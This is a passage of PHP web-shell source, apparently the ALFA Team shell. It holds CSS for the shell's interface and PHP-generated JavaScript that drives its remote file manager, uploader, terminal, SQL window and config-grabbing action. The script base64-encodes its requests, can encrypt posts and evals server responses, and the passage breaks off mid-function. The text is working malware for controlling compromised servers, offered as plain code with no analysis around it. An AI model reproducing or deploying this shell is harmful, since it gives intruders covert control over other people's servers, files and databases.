1467#rightclick_menu hr {
1468 border: 1px solid #EBEBEB;
1469 border-bottom: 0;
1470}
1471.cl-popup-fixed {
1472 position: fixed;
1473 top: 0;
1474 left: 0;
1475 width: 100%;
1476 height: 100%;
1477 background: #201e1ead;
1478}
1479#shortcutMenu-holder {
1480 position: absolute;
1481 top: 40%;
1482 left: 50%;
1483 transform: translate(-50%, -50%);
1484 background: #1f1e1edb;
1485 height: 190px;
1486 width: 500px;
1487 color: #fff;
1488 /* border-radius: 10px; */
1489 /* padding: 10px;*/
1490}
1491#shortcutMenu-holder > .popup-head {
1492 background: #207174;
1493 padding: 6px;
1494 border-top: 10px;
1495 text-align: center;
1496 font-family: sans-serif;
1497 color: #fff;
1498}
1499#shortcutMenu-holder > form {
1500 padding: 10px;
1501}
1502#shortcutMenu-holder > form > label {
1503 display: block;
1504}
1505#shortcutMenu-holder > form > input {
1506 width: 99%;
1507 height: 24px;
1508 margin-top: 4px;
1509 color: #fff;
1510 outline: none;
1511 font-size: 16px;
1512}
1513#shortcutMenu-holder > .popup-foot {
1514 float: right;
1515 height: 30px;
1516 margin-right: 8px;
1517}
1518#shortcutMenu-holder > .popup-foot > button {
1519 height: 100%;
1520 cursor: pointer;
1521 color: #fff;
1522 outline: none;
1523}
1524.php-terminal-output {
1525 overflow: auto;
1526 height: 86%;
1527 border: 1px solid rgb(30, 86, 115);
1528 border-radius: 10px;
1529}
1530.cmd-history-holder {
1531 visibility: hidden;
1532 opacity: 0;
1533 position: absolute;
1534 color: #dff3d5;
1535 background: #093d58;
1536 top: -300px;
1537 height: 300px;
1538 width: calc(69% + -11px);
1539 border-radius: 10px 10px 0 0;
1540 left: calc(2% - 9px);
1541 transition: visibility 0.5s, opacity 0.5s linear;
1542}
1543.cmd-history-holder .commands-history-header {
1544 background: #37504e;
1545 text-align: center;
1546 border-radius: 10px 10px 0 0;
1547}
1548.cmd-history-icon {
1549 width: 27px;
1550 top: 6px;
1551 left: 67%;
1552 position: absolute;
1553 cursor: pointer;
1554}
1555.history-cmd-line {
1556 padding: 4px;
1557 border-bottom: 1px dashed;
1558 cursor: pointer;
1559}
1560.history-cmd-line:hover {
1561 background: #961111;
1562}
1563#myUL, #myUL ul {
1564 list-style-type: none;
1565}
1566
1567#myUL {
1568 margin: 0;
1569 padding: 0;
1570}
1571
1572.box {
1573 cursor: pointer;
1574 -webkit-user-select: none; /* Safari 3.1+ */
1575 -moz-user-select: none; /* Firefox 2+ */
1576 -ms-user-select: none; /* IE 10+ */
1577 user-select: none;
1578}
1579
1580.box::before {
1581 content: "\2610";
1582 color: black;
1583 display: inline-block;
1584 margin-right: 6px;
1585}
1586
1587.check-box::before {
1588 content: "\2611";
1589 color: dodgerblue;
1590}
1591
1592.nested {
1593 display: none;
1594}
1595
1596.active {
1597 display: block;
1598}
1599.flag-holder > img {
1600 width: 20px;
1601 vertical-align: middle;
1602 padding-left: 6px;
1603}
1604#options_window .content_options_holder .options_holder {
1605 position: relative;
1606 display: none;
1607 overflow: auto;
1608 min-height: 300px;
1609 max-height: calc(100vh - 100px);
1610}
1611#options_window .content_options_holder .options_holder .header {
1612 min-height: 50vh;
1613}
1614#options_window .content_options_holder .options_holder.option_is_active {
1615 display:block;
1616}
1617#options_window .content_options_holder .options_tab {
1618 padding: 5px;
1619 margin-left: 14px;
1620 margin-right: 30px;
1621 background: #000;
1622 border-bottom: 7px solid #0f304a;
1623 border-left: 7px solid #0f304a;
1624 border-right: 7px solid #0f304a;
1625 overflow-x: auto;
1626 white-space: nowrap;
1627}
1628#options_window .content_options_holder .options_tab .tab_name img,
1629.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img {
1630 width: 10px;
1631 vertical-align: middle;
1632 margin-left: 5px;
1633}
1634#options_window .content_options_holder .options_tab .tab_name,
1635.editor-tab-name,.sql-tabs .sql-tabname,.sql-tabs .sql-newtab,.terminal-tabs .terminal-tab {
1636 display: inline-block;
1637 background-color: #133d51;
1638 border-radius: 4px;
1639 padding: 5px;
1640 color: #fff;
1641 margin-right: 3px;
1642 padding: 5px;
1643 cursor: pointer;
1644 margin-bottom: 1px;
1645 transition: background-color .5s;
1646}
1647#options_window .content_options_holder .options_tab .tab_name:hover,
1648.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{
1649 background-color: #a23939;
1650}
1651.editor-tabs,.sql-tabs,.terminal-tabs {
1652 padding: 5px;
1653 overflow-x: auto;
1654 white-space: nowrap;
1655}
1656.options-loader-holder {
1657 position: absolute;
1658 top: 0;
1659 left: 0;
1660 width: 100%;
1661 height: 100%;
1662 background: #2b2626c7;
1663 z-index:11;
1664}
1665.options-loader-holder img {
1666 position: absolute;
1667 top: 32%;
1668 left: 45%;
1669 transform: translate(-50%, -50%);
1670 width: 100px;
1671 animation: spin 2s infinite;
1672}
1673#options_window .content_options_holder .options_tab .tab_name.tab_is_active,
1674.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{
1675 background-color: #009688;
1676}
1677.tab-is-done {
1678 animation:2s tab_change_color infinite step-end;
1679}
1680.stopAjax {
1681 color: #fff;
1682 font-size: 20px;
1683 display: inline-block;
1684 padding: 10px;
1685 cursor: pointer;
1686}
1687#a_loader {
1688 display: none;
1689 position: fixed;
1690 top: 0;
1691 left: 0;
1692 width: 100%;
1693 height: 100%;
1694 background: #2b2626c7;
1695 z-index: 99;
1696}
1697.fmanager-row > td {
1698 position: relative;
1699}
1700.fmanager-row .symlink_path {
1701 position: fixed;
1702 max-width: 100%;
1703 background-color: #0f304a;
1704 border-radius: 10px;
1705 font-size: 15px;
1706 padding: 8px;
1707 color: #fdf4f4;
1708 border: 1px solid #8a8a8a;
1709 z-index: 1;
1710}
1711.archive-icons {
1712 vertical-align: middle;
1713}
1714.archive-type-dir {
1715 font-weight: bolder;
1716}
1717.archive-type-file {
1718 font-weight: unset;
1719}
1720.archive-name {
1721 cursor: pointer;
1722}
1723.archive_dir_holder a {
1724 color: #00FF00;
1725 font-weight: bolder;
1726 cursor: pointer;
1727}
1728.archive_dir_holder a:hover {
1729 color: #fff;
1730}
1731.editor-content {
1732 height: 100%;
1733}
1734.editor-content-holder {
1735 height: 90%;
1736}
1737.editor-contents {
1738 display: none;
1739 position: relative;
1740 height: 100%;
1741}
1742.editor-contents.editor-content-active {
1743 display: block;
1744}
1745.history-panel-controller {
1746 position: absolute;
1747 color: #fff;
1748 padding: 10px;
1749 z-index: 1000;
1750 border-radius: 10px;
1751 top: 50%;
1752 left: 19%;
1753 background-color: #009687;
1754 cursor: pointer;
1755}
1756.sql-content {
1757 display: none;
1758 position: relative;
1759 min-height: 300px;
1760}
1761.sql-content.sql-active-content {
1762 display: block;
1763}
1764.pages-holder {
1765 padding: 7px;
1766}
1767.pages-number {
1768 display: inline-block;
1769 margin-left: 10px;
1770}
1771.pages-holder .pages-number a.page-number{
1772 padding: 5px;
1773 background: #0f304a;
1774 margin-right: 8px;
1775 cursor: pointer;
1776 width: 33px;
1777 display: inline-block;
1778 text-align: center;
1779 border-radius: 5px;
1780 color: #fff;
1781 transition: background .5s;
1782}
1783.active-page-number {
1784 background: #10925c !important;
1785}
1786.pages-number a.page-number:hover {
1787 background: #8a8a8a;
1788}
1789.terminal-content {
1790 height: 100%;
1791}
1792.terminal-content,.terminal-tab {
1793 display: none;
1794}
1795.terminal-content.active-terminal-content {
1796 display: block;
1797 position: relative;
1798}
1799.terminal-btn-fontctl {
1800 background: #009688;
1801 width: 50px;
1802 color: #fff;
1803 font-weight:bolder;
1804 outline: none;
1805 cursor: pointer;
1806}
1807.alert-area {
1808 max-height: 100%;
1809 position: fixed;
1810 bottom: 5px;
1811 left: 20px;
1812 right: 20px;
1813 z-index: 9999;
1814}
1815
1816.alert-box {
1817 font-size: 16px;
1818 color: white;
1819 background: rgba(0, 0, 0, 0.9);
1820 line-height: 1.3em;
1821 padding: 10px 15px;
1822 margin: 5px 10px;
1823 position: relative;
1824 border-radius: 5px;
1825 transition: opacity 0.5s ease-in;
1826 -webkit-animation: alert-shake .5s ease-in-out;
1827 animation: alert-shake .5s ease-in-out;
1828}
1829.alert-content-title {
1830 font-weight: bold;
1831}
1832.alert-box.alert-success {
1833 background: rgba(56, 127, 56, 0.89);
1834}
1835.alert-error{
1836 background: rgba(191, 54, 54, 0.89);
1837}
1838.alert-box.hide {
1839 opacity: 0;
1840}
1841
1842.alert-close {
1843 background: transparent;
1844 width: 12px;
1845 height: 12px;
1846 position: absolute;
1847 top: 15px;
1848 right: 15px;
1849}
1850
1851.alert-close:before,
1852.alert-close:after {
1853 content: "";
1854 width: 15px;
1855 border-top: solid 2px white;
1856 position: absolute;
1857 top: 5px;
1858 right: -1px;
1859 display: block;
1860}
1861
1862.alert-close:before {
1863 transform: rotate(45deg);
1864}
1865
1866.alert-close:after {
1867 transform: rotate(135deg);
1868}
1869
1870.alert-close:hover:before,
1871.alert-close:hover:after {
1872 border-top: solid 2px #d8d8d8;
1873}
1874@media (max-width: 767px) and (min-width: 481px) {
1875 .alert-area {
1876 left: 100px;
1877 right: 100px;
1878 }
1879}
1880@media (min-width: 768px) {
1881 .alert-area {
1882 width: 350px;
1883 left: auto;
1884 right: 0;
1885 z-index: 9999;
1886 }
1887}
1888@keyframes tab_change_color {
1889 0%{ background-color:#133d51; }
1890 50%{ background-color:green; }
1891}
1892@-webkit-keyframes alert-shake {
1893 0% {
1894 -webkit-transform: translateX(0);
1895 }
1896 20% {
1897 -webkit-transform: translateX(-10px);
1898 }
1899 40% {
1900 -webkit-transform: translateX(10px);
1901 }
1902 60% {
1903 -webkit-transform: translateX(-10px);
1904 }
1905 80% {
1906 -webkit-transform: translateX(10px);
1907 }
1908 100% {
1909 -webkit-transform: translateX(0);
1910 }
1911}
1912@keyframes alert-shake {
1913 0% {
1914 transform: translateX(0);
1915 }
1916 20% {
1917 transform: translateX(-10px);
1918 }
1919 40% {
1920 transform: translateX(10px);
1921 }
1922 60% {
1923 transform: translateX(-10px);
1924 }
1925 80% {
1926 transform: translateX(10px);
1927 }
1928 100% {
1929 transform: translateX(0);
1930 }
1931}
1932.textEffect {
1933 position: absolute;
1934 width: 500px;
1935 top: -10px;
1936 animation: alert-shake .5s ease-in-out;
1937 animation-iteration-count: 2;
1938}
1939.alfateam-loader-text {
1940 position: absolute;
1941 color: #46bb45;
1942 top: 23%;
1943 left: 49%;
1944 transform: translate(-50%, -50%);
1945 font-size: 40px;
1946 letter-spacing: 7px;
1947}
1948.alfa-ajax-error {
1949 position: absolute;
1950 color: #ff0a0a;
1951 top: 50%;
1952 left: 50%;
1953 transform: translate(-50%, -50%);
1954 font-size: 30px;
1955}
1956.connection-hist-table {
1957 margin-left:auto;
1958 margin-right:auto;
1959 text-align: justify;
1960 border-collapse: collapse;
1961}
1962.connection-hist-table td, .connection-hist-table th {
1963 border: 1px solid #dddddd;
1964 text-align: left;
1965 padding: 8px;
1966}
1967.connection-his-btn {
1968 margin-bottom: 10px;
1969 padding: 5px;
1970 background: #206920;
1971 color: #fff;
1972 border: none;
1973 outline: none;
1974 cursor: pointer;
1975 font-weight: bold;
1976 transition: background .3s;
1977}
1978.connection-his-btn.connection-delete {
1979 margin: unset;
1980 padding: 5px;
1981 background: #ff0000;
1982 width: 33px;
1983 border-radius: 3px;
1984 transition: background .3s;
1985}
1986.connection-delete:hover {
1987 background: #f56969 !important;
1988}
1989.connection-his-btn:hover {
1990 background: #30b330;
1991}
1992#up_bar_holder {
1993 position: fixed;
1994 z-index: 100000;
1995 width: 100%;
1996}
1997@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1998@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1999@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
2000@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
2001#alfaloader{'.$csscode.'width:100px;height:100px;}
2002#a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
2003.ajaxarea{border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
2004.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
2005.main th{text-align:left;}
2006.main a{color: #FFF;}
2007.main tr:hover{background-color:#646464;}
2008.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
2009.bigarea{ width:99%; height:300px; }
2010.alfa_custom_cmd_btn {
2011 padding: 5px;
2012 color: #24ff03;
2013 cursor: pointer;
2014}
2015'.alfaCssLoadColors().'
2016</style>';
2017echo "<script type='text/javascript'>
2018var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
2019var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
2020var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
2021var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
2022var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
2023var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
2024var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
2025var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
2026var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
2027var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
2028var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
2029var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
2030var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
2031var d = document;
2032var mysql_cache = {};
2033var editor_files = {};
2034var editor_error = true;
2035var editor_current_file = '';
2036var php_temrinal_using_cgi = false;
2037var is_minimized = false;
2038var cgi_is_minimized = false;
2039var options_window_is_minimized = false;
2040var database_window_is_minimized = false;
2041var rightclick_menu_context = null;
2042var can_hashchange_work = true;
2043var alfa_can_add_opt = false;
2044var alfa_before_do_action_id = '';
2045var alfa_ace_editors = {editor: null, eval: null};
2046var col_dumper_selected_data = {};
2047var _ALFA_AJAX_ = {};
2048var cgi_lang = '';
2049var upcount = 1;
2050var terminal_walk_index = [];
2051var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
2052var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
2053function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
2054if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
2055if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
2056for($j=1;$j<=10;$j++){
2057echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=\'\';';
2058}
2059echo "
2060if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
2061}";?>
2062function fc(e){var a="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",t="",l=!0,o=0;for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(o++,t+="f[]="+alfab64(decodeURIComponent(d.files.elements[i].value))+"&");if(0==o&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder","block"),e.alfa1.value){case"delete":l=!1,d.querySelectorAll("#filesman_holder .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),$("mchk").checked=!1;break;case"copy":case"move":case"zip":case"unzip":l=!1,d.querySelectorAll("#filesman_holder input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,a+t,function(e){alfaloader("filesman_holder","none"),alfaFmngrContextRow()},l,".FilesMan")}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r="";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status&&("function"!=typeof t?d.getElementsByClassName("ajaxarea")[0].innerHTML=o.responseText:i?(d.getElementsByClassName("ajaxarea")[0].innerHTML=o.responseText,t(o.responseText,l)):t(o.responseText,l)),4==o.readyState&&200!=o.status&&alfaAjaxError(o.status,l,o.statusText,o.responseText)},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=new FormData;i.append("a",alfab64(e.a.value)),i.append("c",alfab64(e.c.value)),i.append("alfa1",alfab64(e.alfa1.value)),i.append("charset",alfab64(e.charset.value)),i.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)i.append("f[]",e.files[a]);else i.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var l=1;l<=upcount;l++){var o=$("pfooterup_"+l);o&&o.parentNode.removeChild(o),upcount--}if(0==upcount&&upcount++,0==t)return!1;var r="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+r+"' class='up_bar'></div>");var n=e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var s=$(r);a.upload&&(s.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";s.style.width=i}),a.onload=function(e){200===a.status?s.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status)if(n==e.c.value)if("noperm"!=a.responseText&&"[]"!=a.responseText){var t,i=JSON.parse(a.responseText),l="",o=d.querySelectorAll("#filemanager_table tr").length-3;for(t in i){++o;var r=i[t].name,s=encodeURIComponent(r),c=i[t].size,f=i[t].perm,u=i[t].modify,_=i[t].owner,p=loadType(r,"file");try{d.querySelector(".fmanager-row a[fname='"+r+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+o+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+r+'" class="chkbx" id="checkbox'+o+'"><label for="checkbox'+o+'"></label></div></td><td id="td_row_'+o+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+o+'" id="id_'+o+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&path="+c_+"&file="+s+'" fname="'+r+'" ftype="file" path="'+c_+'" opt_title="">'+r+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+u+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+_+'</span></td><td><a id="id_chmode_'+o+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+o+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+o+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+o+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+o+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+r+"', 'download')\">D</a><a id=\"id_delete_"+o+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}$("filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");else"noperm"!=a.responseText&&"[]"!=a.responseText?alfaShowNotification("File(s) uploaded successfully","Uploader"):alfaShowNotification("Folder has no permission...","Uploader","error")},a.open("POST",d.URL),a.send(i)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value),"FilesMan"==a?alfaloader("filesman_holder","block"):""!=alfa_before_do_action_id?alfaloader(alfa_before_do_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),alfa_before_do_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),alfa_before_do_action_id=loadPopUpOpTions(a)),alfaloader(alfa_before_do_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var 